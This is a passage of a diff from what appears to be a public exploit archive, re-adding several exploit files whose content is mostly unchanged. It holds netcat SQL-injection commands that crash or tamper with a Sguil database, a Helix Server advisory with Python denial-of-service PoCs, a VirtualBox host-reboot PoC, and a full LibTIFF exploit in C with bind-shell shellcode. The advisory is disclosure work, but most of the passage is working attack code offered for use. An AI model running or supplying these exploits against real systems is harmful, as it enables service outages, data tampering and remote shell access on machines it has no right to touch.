packets. Thanks to the +availability of the netcat program, there is also no need for any programming +skill. Also, the attack can run on any port, so even an unprivileged user +could potentially run this attack. + +Without further ado, here's the good stuff: + +TO CRASH THE SERVER: +from a box that has its traffic monitored, run +echo “SSH-2.0-OpenSSH_1.4′,’deadbeefcafe’);–” | nc -l 7777 +...and then telnet to port 7777 from another box. There will be a syntax +error in the sguil management daemon's SQL insert statement, and it will +crash rather ungracefully. This is highly noticable, so be careful! + +TO INJECT DATA SILENTLY: +from a box that has its traffic monitored, run +echo “SSH-2.0-OpenSSH_1.4′,’deadbeefcafe’)–” | nc -l 8888 +...and then telnet to port 8888 from another box. The difference here is the +semicolon in the statement. This will insert an asset into the SQL database as +ssh version 1.4, protocol 2.0. Obviously, you can have some fun with this ;-) + +PROOF OF CONCEPT: +mysql> use sguildb; +Reading table information for completion of table and column names +You can turn off this feature to get a quicker startup with -A + +Database changed +mysql> select * from pads where `hex_payload`=’deadbeefcafe’; ++————–+—–+———-+———————+————+———+——+———-+————-+————–+ +| hostname | sid | asset_id | timestamp | ip | service | port | ip_proto | application | hex_payload | ++————–+—–+———-+———————+————+———+——+———-+————-+————–+ +| [REMOVED] | 1 | 7 | 2009-06-08 14:28:02 | [REMOVED] | ssh | 1061 | 6 | OpenSSH 1.4 | deadbeefcafe | ++————–+—–+———-+———————+————+———+——+———-+————-+————–+ +1 row in set (0.01 sec) + + +Note that you don't even need to put in legit hex into the attack for it to work. Bonus points +if you put in a hexadecimal message to the sysadmin that doesn't even contain legit hex. + +# milw0rm.com [2009-07-17] diff --git a/platforms/multiple/dos/9198.txt b/platforms/multiple/dos/9198.txt index 40d82c422..5861a9b01 100755 --- a/platforms/multiple/dos/9198.txt +++ b/platforms/multiple/dos/9198.txt @@ -1,323 +1,323 @@ ------BEGIN PGP SIGNED MESSAGE----- -Hash: SHA1 - - Core Security Technologies - CoreLabs Advisory - http://www.coresecurity.com/corelabs/ - -Real Helix DNA RTSP and SETUP request handler vulnerabilities - - -1. *Advisory Information* - -Title: Real Helix DNA RTSP and SETUP request handler vulnerabilities -Advisory ID: CORE-2009-0227 -Advisory URL: http://www.coresecurity.com/content/real-helix-dna -Date published: 2009-07-17 -Date of last update: 2009-07-17 -Vendors contacted: RealNetworks -Release mode: Forced release - - -2. *Vulnerability Information* - -Class: Denial of service (DoS) -Remotely Exploitable: Yes -Locally Exploitable: No -Bugtraq ID: N/A -CVE Name: CVE-2009-2533, CVE-2009-2534 - - -3. *Vulnerability Description* - -Helix Server is a multi-format cross-platform streaming server. Two -vulnerabilities have been found, that could allow a remote attacker to -crash the Helix Server. - -During a 'RTSP' (SET_PARAMETERS) request handling, if an empty -'DataConvertBuffer' parameter is received by the server, it will raise -an exception reading an invalid direction of memory. This exception is -usually handled correctly but if you send this malformed request -multiple times in a short period of time, it could render the Helix -Server unresponsive and terminate its execution. - -During the 'SETUP' request handling, a 0x2F character is searched in the -request line, if this byte is absent the process crashes with an access -violation. - - -4. *Vulnerable packages* - - . Helix Server Version 12.x - . Helix Mobile Server Version 12.x - . The vulnerabilities were investigated on Helix Server Version -12.0.1.215 (Tahiti) Build 175002/12667 - - -5. *Non-vulnerable packages* - - . Helix Server Version 13.0.0 - . Helix Mobile Server Version 13.0.0 - - -6. *Vendor Information, Solutions and Workarounds* - -According to the Security Update 071409HS [2] published by RealNetworks: -"The vulnerability is resolved on the following platforms by installing -Version 13.0.0 of the Helix Server and the Helix Mobile Server. This -only pertains to supported versions of the platforms listed below. The -updated version will be available on your RealNetworks PAM site after -12:00 am PST, on July 14, 2009." - - . Red Hat Enterprise Linux 4 - . Red Hat Enterprise Linux 5 - . Sun Solaris 10 - . Windows 2003 - - -7. *Credits* - -These vulnerabilities were discovered and researched by Damian Frizza -from Core Security Technologies. - - -8. *Technical Description / Proof of Concept Code* - - -8.1. *RTSP request handling Denial of Service (CVE-2009-2533)* - -The problem arises when the 'rmserver' process receives an 'RTSP -(SET_PARAMETER)' request with no content in the 'DataConvertBuffer' -parameter. The handling code reads at the memory location zero (0) and -triggers an exception, which is handled correctly. However sending this -malformed request multiple times renders the rmserver process -unresponsive and subsequently stops its execution. - -The code section which triggers the exception is: - -/----------- - -00458066 |. C745 08 00000000 MOV DWORD PTR SS:[EBP+8],0 -*Sets the content of the local variable to 0 -0045806D |. 8B10 MOV EDX,DWORD PTR DS:[EAX] -0045806F |. 50 PUSH EAX -00458070 |. FF52 2C CALL DWORD PTR DS:[EDX+2C] -00458073 |. 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] -00458076 |. 8B10 MOV EDX,DWORD PTR DS:[EAX] * -Tries to read form 0 memory location - -- -----------/ - - The following PoC code reproduces the issue: - -/----------- - -import socket - -s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) -s.connect(('172.16.132.133',554)) - -setRequest = "SET_PARAMETER / RTSP/1.0\r\n" -setRequest +="DataConvertBuffer: \r\n\r\n" - -for i in range(5): - print i - s.send(setRequest) - -s.close() - -- -----------/ - - - -The following output is written in the log file: - -/----------- - -4068: FATAL ERROR: The server has run out of memory! -FATAL ERROR: Last request was rounded up to 1155072 bytes -Trace: -0x00409C96 -... -... -... -0x00000000 -FATAL ERROR: Server Terminated - -- -----------/ - - -8.2. *Malformed SETUP command handling Denial of Service (CVE-2009-2534)* - -The problem arises when the 'SETUP' request is handled and the byte 0x2F -is absent in the request line. While handling this kind of malformed -request the server crashes with an access violation. - -The code section which triggers the access violation is: - -/----------- - -0047A490 |. 6A 2F PUSH 2F -0047A492 |. 56 PUSH ESI -0047A493 |. FF15 08425100 CALL DWORD PTR DS:[<&MSVCR71.strchr>] - ; MSVCR71.strchr - -- -----------/ - - if only the "/" (0x2F) character is sent, the program tries to copy -from 0 and the access violation exception is raised. - -/----------- - -0047A490 |. 6A 2F PUSH 2F -0047A492 |. 56 PUSH ESI -0047A493 |. FF15 08425100 CALL DWORD PTR DS:[<&MSVCR71.strchr>] - ; MSVCR71.strchr - -- -----------/ - - The following code reproduces the issue: - -/----------- - -import socket - -s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) -s.connect(('172.16.132.133',554)) - -setRequest = "SETUP / RTSP/1.0\r\n\r\n" - -s.send(setRequest) -s.close() - -- -----------/ - - -9. *Report Timeline* - -. 2009-03-04: -Core Security Technologies notifies RealNetworks of the vulnerability. -Core initially schedules publication of its advisory to April 6th, 2009. - -. 2009-03-16: -Core notifies again RealNetworks of the vulnerability. - -. 2009-03-16: -RealNetworks identifies the vulnerability alert as SPAM. - -. 2009-03-20: -The RealNetworks team asks Core for a technical description of the -vulnerability. - -. 2009-03-23: -Technical details sent to RealNetworks team by Core. RealNetworks -acknowledges reception. - -. 2009-03-30: -Core requests information about the plans of RealNetworks to fix the -vulnerabilities. - -. 2009-03-30: -RealNetworks responds that fixes will be included in the next public -release - currently targeted for July 2009. - -. 2009-05-04: -Core requests RealNetworks a technical analysis of the vulnerabilities, -a list of the affected versions of Helix Server, and a detailed timeline -for developing, testing and releasing fixes for these vulnerabilities. -It is only based on that information that Core can reevaluate its -advisory publication timeframe (which was originally scheduled to be -published on April 6). - -. 2009-05-05: -RealNetworks responds that fixes will be available in mid-2009, most -likely in the July time frame, and that to protect its customer base -RealNetworks will not provide additional details until the release is -publicly available. - -. 2009-05-05: -Core requests a more precise estimation for the release of fixes (no -reply received). - -. 2009-05-29: -Core requests again RealNetworks an estimated date for the release of -fixes, and technical details about the issues. In the meantime, the -publication of advisory CORE-2009-0227 is rescheduled for July 15th (no -reply received). - -. 2009-07-16: -An updated version of the advisory was sent to RealNetworks by Core. -Core requests again information about this issue. - -. 2009-07-17: -Core is made aware that Real Networks has released the Security Update -071409HS [2] on July 14th, which states that version 13.0.0 of the Helix -Server and the Helix Mobile Server have been updated to ensure that the -above vulnerabilities have been resolved. - -. 2009-07-17: -The advisory CORE-2009-0227 is published by Core. - - - -10. *References* - -[1] RealNetworks -http://www.realnetworks.com/ -[2] RealNetworks Security Update 071409HS -http://docs.real.com/docs/security/SecurityUpdate071409HS.pdf - - -11. *About CoreLabs* - -CoreLabs, the research center of Core Security Technologies, is charged -with anticipating the future needs and requirements for information -security technologies. We conduct our research in several important -areas of computer security including system vulnerabilities, cyber -attack planning and simulation, source code auditing, and cryptography. -Our results include problem formalization, identification of -vulnerabilities, novel solutions and prototypes for new technologies. -CoreLabs regularly publishes security advisories, technical papers, -project information and shared software tools for public use at: -http://www.coresecurity.com/corelabs. - - -12. *About Core Security Technologies* - -Core Security Technologies develops strategic solutions that help -security-conscious organizations worldwide develop and maintain a -proactive process for securing their networks. The company's flagship -product, CORE IMPACT, is the most comprehensive product for performing -enterprise security assurance testing. CORE IMPACT evaluates network, -endpoint and end-user vulnerabilities and identifies what resources are -exposed. It enables organizations to determine if current security -investments are detecting and preventing attacks. Core Security -Technologies augments its leading technology solution with world-class -security consulting services, including penetration testing and software -security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core -Security Technologies can be reached at 617-399-6980 or on the Web at -http://www.coresecurity.com. - - -13. *Disclaimer* - -The contents of this advisory are copyright (c) 2009 Core Security -Technologies and (c) 2009 CoreLabs, and may be distributed freely -provided that no fee is charged for this distribution and proper credit -is given. - - -14. *PGP/GPG Keys* - -This advisory has been signed with the GPG key of Core Security -Technologies advisories team, which is available for download at -http://www.coresecurity.com/files/attachments/core_security_advisories.asc. ------BEGIN PGP SIGNATURE----- -Version: GnuPG v1.4.8 (MingW32) -Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org - -iEYEARECAAYFAkpg7eMACgkQyNibggitWa38bgCeNFBQ02cGJvhhtc8eYMaEa9VH -UHMAn3Ngc4GBXkyfSe+hkgJWYtQ13Vjh -=9iPO ------END PGP SIGNATURE----- - -# milw0rm.com [2009-07-17] +-----BEGIN PGP SIGNED MESSAGE----- +Hash: SHA1 + + Core Security Technologies - CoreLabs Advisory + http://www.coresecurity.com/corelabs/ + +Real Helix DNA RTSP and SETUP request handler vulnerabilities + + +1. *Advisory Information* + +Title: Real Helix DNA RTSP and SETUP request handler vulnerabilities +Advisory ID: CORE-2009-0227 +Advisory URL: http://www.coresecurity.com/content/real-helix-dna +Date published: 2009-07-17 +Date of last update: 2009-07-17 +Vendors contacted: RealNetworks +Release mode: Forced release + + +2. *Vulnerability Information* + +Class: Denial of service (DoS) +Remotely Exploitable: Yes +Locally Exploitable: No +Bugtraq ID: N/A +CVE Name: CVE-2009-2533, CVE-2009-2534 + + +3. *Vulnerability Description* + +Helix Server is a multi-format cross-platform streaming server. Two +vulnerabilities have been found, that could allow a remote attacker to +crash the Helix Server. + +During a 'RTSP' (SET_PARAMETERS) request handling, if an empty +'DataConvertBuffer' parameter is received by the server, it will raise +an exception reading an invalid direction of memory. This exception is +usually handled correctly but if you send this malformed request +multiple times in a short period of time, it could render the Helix +Server unresponsive and terminate its execution. + +During the 'SETUP' request handling, a 0x2F character is searched in the +request line, if this byte is absent the process crashes with an access +violation. + + +4. *Vulnerable packages* + + . Helix Server Version 12.x + . Helix Mobile Server Version 12.x + . The vulnerabilities were investigated on Helix Server Version +12.0.1.215 (Tahiti) Build 175002/12667 + + +5. *Non-vulnerable packages* + + . Helix Server Version 13.0.0 + . Helix Mobile Server Version 13.0.0 + + +6. *Vendor Information, Solutions and Workarounds* + +According to the Security Update 071409HS [2] published by RealNetworks: +"The vulnerability is resolved on the following platforms by installing +Version 13.0.0 of the Helix Server and the Helix Mobile Server. This +only pertains to supported versions of the platforms listed below. The +updated version will be available on your RealNetworks PAM site after +12:00 am PST, on July 14, 2009." + + . Red Hat Enterprise Linux 4 + . Red Hat Enterprise Linux 5 + . Sun Solaris 10 + . Windows 2003 + + +7. *Credits* + +These vulnerabilities were discovered and researched by Damian Frizza +from Core Security Technologies. + + +8. *Technical Description / Proof of Concept Code* + + +8.1. *RTSP request handling Denial of Service (CVE-2009-2533)* + +The problem arises when the 'rmserver' process receives an 'RTSP +(SET_PARAMETER)' request with no content in the 'DataConvertBuffer' +parameter. The handling code reads at the memory location zero (0) and +triggers an exception, which is handled correctly. However sending this +malformed request multiple times renders the rmserver process +unresponsive and subsequently stops its execution. + +The code section which triggers the exception is: + +/----------- + +00458066 |. C745 08 00000000 MOV DWORD PTR SS:[EBP+8],0 +*Sets the content of the local variable to 0 +0045806D |. 8B10 MOV EDX,DWORD PTR DS:[EAX] +0045806F |. 50 PUSH EAX +00458070 |. FF52 2C CALL DWORD PTR DS:[EDX+2C] +00458073 |. 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] +00458076 |. 8B10 MOV EDX,DWORD PTR DS:[EAX] * +Tries to read form 0 memory location + +- -----------/ + + The following PoC code reproduces the issue: + +/----------- + +import socket + +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +s.connect(('172.16.132.133',554)) + +setRequest = "SET_PARAMETER / RTSP/1.0\r\n" +setRequest +="DataConvertBuffer: \r\n\r\n" + +for i in range(5): + print i + s.send(setRequest) + +s.close() + +- -----------/ + + + +The following output is written in the log file: + +/----------- + +4068: FATAL ERROR: The server has run out of memory! +FATAL ERROR: Last request was rounded up to 1155072 bytes +Trace: +0x00409C96 +... +... +... +0x00000000 +FATAL ERROR: Server Terminated + +- -----------/ + + +8.2. *Malformed SETUP command handling Denial of Service (CVE-2009-2534)* + +The problem arises when the 'SETUP' request is handled and the byte 0x2F +is absent in the request line. While handling this kind of malformed +request the server crashes with an access violation. + +The code section which triggers the access violation is: + +/----------- + +0047A490 |. 6A 2F PUSH 2F +0047A492 |. 56 PUSH ESI +0047A493 |. FF15 08425100 CALL DWORD PTR DS:[<&MSVCR71.strchr>] + ; MSVCR71.strchr + +- -----------/ + + if only the "/" (0x2F) character is sent, the program tries to copy +from 0 and the access violation exception is raised. + +/----------- + +0047A490 |. 6A 2F PUSH 2F +0047A492 |. 56 PUSH ESI +0047A493 |. FF15 08425100 CALL DWORD PTR DS:[<&MSVCR71.strchr>] + ; MSVCR71.strchr + +- -----------/ + + The following code reproduces the issue: + +/----------- + +import socket + +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +s.connect(('172.16.132.133',554)) + +setRequest = "SETUP / RTSP/1.0\r\n\r\n" + +s.send(setRequest) +s.close() + +- -----------/ + + +9. *Report Timeline* + +. 2009-03-04: +Core Security Technologies notifies RealNetworks of the vulnerability. +Core initially schedules publication of its advisory to April 6th, 2009. + +. 2009-03-16: +Core notifies again RealNetworks of the vulnerability. + +. 2009-03-16: +RealNetworks identifies the vulnerability alert as SPAM. + +. 2009-03-20: +The RealNetworks team asks Core for a technical description of the +vulnerability. + +. 2009-03-23: +Technical details sent to RealNetworks team by Core. RealNetworks +acknowledges reception. + +. 2009-03-30: +Core requests information about the plans of RealNetworks to fix the +vulnerabilities. + +. 2009-03-30: +RealNetworks responds that fixes will be included in the next public +release - currently targeted for July 2009. + +. 2009-05-04: +Core requests RealNetworks a technical analysis of the vulnerabilities, +a list of the affected versions of Helix Server, and a detailed timeline +for developing, testing and releasing fixes for these vulnerabilities. +It is only based on that information that Core can reevaluate its +advisory publication timeframe (which was originally scheduled to be +published on April 6). + +. 2009-05-05: +RealNetworks responds that fixes will be available in mid-2009, most +likely in the July time frame, and that to protect its customer base +RealNetworks will not provide additional details until the release is +publicly available. + +. 2009-05-05: +Core requests a more precise estimation for the release of fixes (no +reply received). + +. 2009-05-29: +Core requests again RealNetworks an estimated date for the release of +fixes, and technical details about the issues. In the meantime, the +publication of advisory CORE-2009-0227 is rescheduled for July 15th (no +reply received). + +. 2009-07-16: +An updated version of the advisory was sent to RealNetworks by Core. +Core requests again information about this issue. + +. 2009-07-17: +Core is made aware that Real Networks has released the Security Update +071409HS [2] on July 14th, which states that version 13.0.0 of the Helix +Server and the Helix Mobile Server have been updated to ensure that the +above vulnerabilities have been resolved. + +. 2009-07-17: +The advisory CORE-2009-0227 is published by Core. + + + +10. *References* + +[1] RealNetworks +http://www.realnetworks.com/ +[2] RealNetworks Security Update 071409HS +http://docs.real.com/docs/security/SecurityUpdate071409HS.pdf + + +11. *About CoreLabs* + +CoreLabs, the research center of Core Security Technologies, is charged +with anticipating the future needs and requirements for information +security technologies. We conduct our research in several important +areas of computer security including system vulnerabilities, cyber +attack planning and simulation, source code auditing, and cryptography. +Our results include problem formalization, identification of +vulnerabilities, novel solutions and prototypes for new technologies. +CoreLabs regularly publishes security advisories, technical papers, +project information and shared software tools for public use at: +http://www.coresecurity.com/corelabs. + + +12. *About Core Security Technologies* + +Core Security Technologies develops strategic solutions that help +security-conscious organizations worldwide develop and maintain a +proactive process for securing their networks. The company's flagship +product, CORE IMPACT, is the most comprehensive product for performing +enterprise security assurance testing. CORE IMPACT evaluates network, +endpoint and end-user vulnerabilities and identifies what resources are +exposed. It enables organizations to determine if current security +investments are detecting and preventing attacks. Core Security +Technologies augments its leading technology solution with world-class +security consulting services, including penetration testing and software +security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core +Security Technologies can be reached at 617-399-6980 or on the Web at +http://www.coresecurity.com. + + +13. *Disclaimer* + +The contents of this advisory are copyright (c) 2009 Core Security +Technologies and (c) 2009 CoreLabs, and may be distributed freely +provided that no fee is charged for this distribution and proper credit +is given. + + +14. *PGP/GPG Keys* + +This advisory has been signed with the GPG key of Core Security +Technologies advisories team, which is available for download at +http://www.coresecurity.com/files/attachments/core_security_advisories.asc. +-----BEGIN PGP SIGNATURE----- +Version: GnuPG v1.4.8 (MingW32) +Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org + +iEYEARECAAYFAkpg7eMACgkQyNibggitWa38bgCeNFBQ02cGJvhhtc8eYMaEa9VH +UHMAn3Ngc4GBXkyfSe+hkgJWYtQ13Vjh +=9iPO +-----END PGP SIGNATURE----- + +# milw0rm.com [2009-07-17] diff --git a/platforms/multiple/dos/9323.txt b/platforms/multiple/dos/9323.txt index 9a30cacb7..8d4f4201e 100755 --- a/platforms/multiple/dos/9323.txt +++ b/platforms/multiple/dos/9323.txt @@ -1,34 +1,34 @@ -Sun's VirtualBox host reboot PoC -by Tadas Vilkeliskis -Disclosure made at 2009-08-01 - -VULNERABILITY INFORMATION - -Remotely exploitable: no -Locally exploitable: yes -Affected versions: 2.2 - 3.0.2 r49928 for Linux - -VULNERABILITY DESCRIPTION - -VirtualBox VM is unable to handle fast call to privilege level 0 system -procedures (sysenter). If sysenter instruction is executed on the guest -OS the host machine will reboot. The technique was tested on the -following guest OS: Windows XP, Windows 7 RC, Ubuntu 9.04. It is not -clear whether it is possible to execute arbitrary code on the host, -however this trick can be successfully used by malware as an anti-vm -trick. - -POC - -; nasm -f elf vmhostreboot.asm -; gcc vmhostreboot.o -o vmhostreboot - -BITS 32 -SECTION .text -GLOBAL main - -main: - sysenter - ret - -# milw0rm.com [2009-08-01] +Sun's VirtualBox host reboot PoC +by Tadas Vilkeliskis +Disclosure made at 2009-08-01 + +VULNERABILITY INFORMATION + +Remotely exploitable: no +Locally exploitable: yes +Affected versions: 2.2 - 3.0.2 r49928 for Linux + +VULNERABILITY DESCRIPTION + +VirtualBox VM is unable to handle fast call to privilege level 0 system +procedures (sysenter). If sysenter instruction is executed on the guest +OS the host machine will reboot. The technique was tested on the +following guest OS: Windows XP, Windows 7 RC, Ubuntu 9.04. It is not +clear whether it is possible to execute arbitrary code on the host, +however this trick can be successfully used by malware as an anti-vm +trick. + +POC + +; nasm -f elf vmhostreboot.asm +; gcc vmhostreboot.o -o vmhostreboot + +BITS 32 +SECTION .text +GLOBAL main + +main: + sysenter + ret + +# milw0rm.com [2009-08-01] diff --git a/platforms/multiple/dos/946.c b/platforms/multiple/dos/946.c index 5e1aabbec..7ad57d373 100755 --- a/platforms/multiple/dos/946.c +++ b/platforms/multiple/dos/946.c @@ -151,6 +151,6 @@ strcat(str,temp); return 0; } - - -// milw0rm.com [2005-04-19] + + +// milw0rm.com [2005-04-19] diff --git a/platforms/multiple/dos/956.c b/platforms/multiple/dos/956.c index 2eb952513..848bce156 100755 --- a/platforms/multiple/dos/956.c +++ b/platforms/multiple/dos/956.c @@ -251,6 +251,6 @@ void printe(char *err,signed char e){ printf("[!] %s\n",err); if(e)exit(e); return; -} - -// milw0rm.com [2005-04-26] +} + +// milw0rm.com [2005-04-26] diff --git a/platforms/multiple/dos/984.c b/platforms/multiple/dos/984.c index 1fbccb445..4c5121b63 100755 --- a/platforms/multiple/dos/984.c +++ b/platforms/multiple/dos/984.c @@ -256,6 +256,6 @@ void printe(char *err,signed char e){ printf("[!] %s\n",err); if(e)exit(e); return; -} - -// milw0rm.com [2005-05-07] +} + +// milw0rm.com [2005-05-07] diff --git a/platforms/multiple/local/1119.txt b/platforms/multiple/local/1119.txt index 7a435ed63..7921804b2 100755 --- a/platforms/multiple/local/1119.txt +++ b/platforms/multiple/local/1119.txt @@ -12,6 +12,6 @@ Have fun making your own commands. The advisory can be found at: http://www.guninski.com/where_do_you_want_billg_to_go_today_5.html -/str0ke - -# milw0rm.com [2005-07-25] +/str0ke + +# milw0rm.com [2005-07-25] diff --git a/platforms/multiple/local/1554.c b/platforms/multiple/local/1554.c index 58b84d868..b455dd0b4 100755 --- a/platforms/multiple/local/1554.c +++ b/platforms/multiple/local/1554.c @@ -1,135 +1,135 @@ -/* - LibTIFF exploit - Tested on LibTIFF 3.7.1 - Coded by Agustin Gianni (agustingianni at gmail.com) and Samelat - - Blog: http://gruba.blogspot.com - - In other versions and/or Linux distributions you might need to - adjust some offsets. - - gr00vy@kenny:/home/gr00vy/EXPLOIT$ make libtiff_exploit - cc libtiff_exploit.c -o libtiff_exploit - gr00vy@kenny:/home/gr00vy/EXPLOIT$ ./libtiff_exploit /usr/local/bin/tiffinfo evil.tiff - Using RET: 0xbfffffb4 - TIFFReadDirectory: - Warning, evil.tiff: unknown field with tag 260 (0x104) encountered. - evil.tiff: - Warning, incorrect count for field "PhotometricInterpretation" (150341633, expecting 1); tag trimmed. - evil.tiff: - Warning, incorrect count for field "BitsPerSample" (257, expecting 1); tag trimmed. - sh-3.00$ - - gr00vy@kenny:/home/gr00vy/storage/Exploits/Libtiff-3.7.1$ ./libtiff_exploit - /usr/kde/3.3/bin/konqueror evil.tiff - Linux Enabled - Using RET: 0xbfffffb1 - konqueror: ERROR: Error in BrowserExtension::actionSlotMap(), unknown action : searchProvider - konqueror: ERROR: Error in BrowserExtension::actionSlotMap(), unknown action : searchProvider - TIFFReadDirectory: Warning, : unknown field with tag 260 (0x104) encountered. - : Warning, incorrect count for field "PhotometricInterpretation" (150341633, expecting 1); - tag - trimmed. - : Warning, incorrect count for field "BitsPerSample" (257, expecting 1); tag trimmed. - sh-3.00$ exit - exit - - Heheh it also works like a remote exploit i would leave that work (easy work) for the - "interested" people. - -*/ - -#include -#include -#include -#include -#include -#include -#include - -#define OFFSET 0x3F /* return address offset */ -#define SHELL_OFFSET 0x0102 /* shellcode address offset */ -#define DISPLAY "DISPLAY=:0.0" /* no comments ... */ -#define HOMEDIR "HOME=/tmp/" - -int -main(int argc, char **argv, char **env) -{ - /* Linux shellcode that binds a shell on port 4369 */ -char linux_bind[] = "\x31\xc0\x50\x40\x50\x40\x50\xb0\x66\x31" - "\xdb\x43\x89\xe1\xcd\x80\x99\x52\x52\x52" - "\xba\x02\x01\x11\x11\xfe\xce\x52\x89\xe2" - "\x31\xc9\xb1\x10\x51\x52\x50\x89\xc2\x89" - "\xe1\xb0\x66\xb3\x02\x89\xe1\xcd\x80\xb0" - "\x66\xb3\x04\x53\x52\x89\xe1\xcd\x80\x31" - "\xc0\x50\x50\x52\x89\xe1\xb0\x66\xb3\x05" - "\xcd\x80\x89\xc3\x31\xc9\xb1\x03\xb0\x3f" - "\x49\xcd\x80\x41\xe2\xf8\x51\x68\x6e\x2f" - "\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x51" - "\x53\x89\xe1\x99\xb0\x0b\xcd\x80"; - - /* (?) lies lies lies lies!*/ - #ifdef FREEBSD - printf("FreeBSD Enabled\n"); - char shellcode[]= - "\xeb\x0e\x5e\x31\xc0\x88\x46\x07\x50\x50\x56\xb0\x3b\x50\xcd" - "\x80\xe8\xed\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23"; - - #else - printf("Linux Enabled\n"); - char shellcode[] = - "\xeb\x20\x5e\x89\x76\x08\x31\xc0\x89\x46\x0c" - "\x88\x46\x07\x8d\x56\x0c\x8d\x4e\x08\x89\xf3" - "\x31\xc0\xb0\x0b\xcd\x80\x31\xdb\xb0\x01\xcd" - "\x80\xe8\xdb\xff\xff\xff\x2f\x62\x69\x6e\x2f" - "\x73\x68\x23"; - - #endif - - if(argc < 3) - { - fprintf(stderr, "Error, arguments are like these\n" - "%s \n", argv[0]); - return -1; - } - - char *envp[] = {HOMEDIR, DISPLAY, shellcode, NULL}; - - /* argv[1] -> executable file that is linked with vuln tiff library */ - long ret = 0xc0000000 - sizeof(void *) - strlen(argv[1]) - strlen(shellcode) - 0x02; - - int fd = open(argv[2], O_RDWR); - if(fd == -1) - { - perror("open()"); - return -1; - } - - if(lseek(fd, OFFSET, SEEK_SET) == -1) - { - perror("lseek()"); - close(fd); - return -1; - } - - if(write(fd, (void *) &ret, sizeof(long)) < sizeof(long)) - { - perror("write()"); - close(fd); - return -1; - } - - close(fd); - - fprintf(stdout, "Using RET: 0x%.8x\n", (unsigned int) ret); - - if(execle(argv[1], "tiff", argv[2], NULL, envp) == -1) - { - perror("execve()"); - return -1; - } - - return 0; -} - -// milw0rm.com [2006-03-05] +/* + LibTIFF exploit + Tested on LibTIFF 3.7.1 + Coded by Agustin Gianni (agustingianni at gmail.com) and Samelat + + Blog: http://gruba.blogspot.com + + In other versions and/or Linux distributions you might need to + adjust some offsets. + + gr00vy@kenny:/home/gr00vy/EXPLOIT$ make libtiff_exploit + cc libtiff_exploit.c -o libtiff_exploit + gr00vy@kenny:/home/gr00vy/EXPLOIT$ ./libtiff_exploit /usr/local/bin/tiffinfo evil.tiff + Using RET: 0xbfffffb4 + TIFFReadDirectory: + Warning, evil.tiff: unknown field with tag 260 (0x104) encountered. + evil.tiff: + Warning, incorrect count for field "PhotometricInterpretation" (150341633, expecting 1); tag trimmed. + evil.tiff: + Warning, incorrect count for field "BitsPerSample" (257, expecting 1); tag trimmed. + sh-3.00$ + + gr00vy@kenny:/home/gr00vy/storage/Exploits/Libtiff-3.7.1$ ./libtiff_exploit + /usr/kde/3.3/bin/konqueror evil.tiff + Linux Enabled + Using RET: 0xbfffffb1 + konqueror: ERROR: Error in BrowserExtension::actionSlotMap(), unknown action : searchProvider + konqueror: ERROR: Error in BrowserExtension::actionSlotMap(), unknown action : searchProvider + TIFFReadDirectory: Warning, : unknown field with tag 260 (0x104) encountered. + : Warning, incorrect count for field "PhotometricInterpretation" (150341633, expecting 1); + tag + trimmed. + : Warning, incorrect count for field "BitsPerSample" (257, expecting 1); tag trimmed. + sh-3.00$ exit + exit + + Heheh it also works like a remote exploit i would leave that work (easy work) for the + "interested" people. + +*/ + +#include +#include +#include +#include +#include +#include +#include + +#define OFFSET 0x3F /* return address offset */ +#define SHELL_OFFSET 0x0102 /* shellcode address offset */ +#define DISPLAY "DISPLAY=:0.0" /* no comments ... */ +#define HOMEDIR "HOME=/tmp/" + +int +main(int argc, char **argv, char **env) +{ + /* Linux shellcode that binds a shell on port 4369 */ +char linux_bind[] = "\x31\xc0\x50\x40\x50\x40\x50\xb0\x66\x31" + "\xdb\x43\x89\xe1\xcd\x80\x99\x52\x52\x52" + "\xba\x02\x01\x11\x11\xfe\xce\x52\x89\xe2" + "\x31\xc9\xb1\x10\x51\x52\x50\x89\xc2\x89" + "\xe1\xb0\x66\xb3\x02\x89\xe1\xcd\x80\xb0" + "\x66\xb3\x04\x53\x52\x89\xe1\xcd\x80\x31" + "\xc0\x50\x50\x52\x89\xe1\xb0\x66\xb3\x05" + "\xcd\x80\x89\xc3\x31\xc9\xb1\x03\xb0\x3f" + "\x49\xcd\x80\x41\xe2\xf8\x51\x68\x6e\x2f" + "\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x51" + "\x53\x89\xe1\x99\xb0\x0b\xcd\x80"; + + /* (?) lies lies lies lies!*/ + #ifdef FREEBSD + printf("FreeBSD Enabled\n"); + char shellcode[]= + "\xeb\x0e\x5e\x31\xc0\x88\x46\x07\x50\x50\x56\xb0\x3b\x50\xcd" + "\x80\xe8\xed\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23"; + + #else + printf("Linux Enabled\n"); + char shellcode[] = + "\xeb\x20\x5e\x89\x76\x08\x31\xc0\x89\x46\x0c" + "\x88\x46\x07\x8d\x56\x0c\x8d\x4e\x08\x89\xf3" + "\x31\xc0\xb0\x0b\xcd\x80\x31\xdb\xb0\x01\xcd" + "\x80\xe8\xdb\xff\xff\xff\x2f\x62\x69\x6e\x2f" + "\x73\x68\x23"; + + #endif + + if(argc < 3) + { + fprintf(stderr, "Error, arguments are like these\n" + "%s \n", argv[0]); + return -1; + } + + char *envp[] = {HOMEDIR, DISPLAY, shellcode, NULL}; + + /* argv[1] -> executable file that is linked with vuln tiff library */ + long ret = 0xc0000000 - sizeof(void *) - strlen(argv[1]) - strlen(shellcode) - 0x02; + + int fd = open(argv[2], O_RDWR); + if(fd == -1) + { + perror("open()"); + return -1; + } + + if(lseek(fd, OFFSET, SEEK_SET) == -1) + { + perror("lseek()"); + close(fd); + return -1; + } + + if(write(fd, (void *) &ret, sizeof(long)) < sizeof(long)) + { + perror("write()"); + close(fd); + return -1; + } + + close(fd); + + fprintf(stdout, "Using RET: 0x%.8x\n", (unsigned int) ret); + + if(execle(argv[1], "tiff", argv[2], NULL, envp) == -1) + { + perror("execve()"); + return -1; + } + + return 0; +} + +// milw0rm.com [2006-03-05] diff --git 